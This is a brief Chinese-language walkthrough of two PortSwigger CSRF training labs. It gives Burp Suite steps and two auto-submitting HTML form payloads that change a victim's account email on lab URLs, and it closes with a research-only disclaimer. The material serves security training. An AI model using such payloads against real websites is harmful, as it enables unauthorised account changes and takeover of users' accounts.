靶场地址:https://portswigger.net/web-security实验1:CSRF vulnerability with no defenses
1.登录后修改邮箱抓包,生成csrf
2.使用burpsuite生成的html包进行存储和向受害者发送(每次发送需要变更邮箱)
3.再使用靶场提供的包进行存储和向受害者发送,通过此关
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script> document.forms[0].submit(); </script>
实验2:CSRF where token validation depends on request method
1.登录后修改邮箱抓包,变更请求方法并生成csrf包
2.使用burpsuite生成的html包进行存储和向受害者发送
3.再使用靶场提供的包进行存储和向受害者发送,通过此关(每次发送需要变更邮箱)
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script> document.forms[0].submit(); </script>
原文始发于微信公众号(鲲哥的Bypass之旅):portswigger CSRF靶场-Lab1,2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论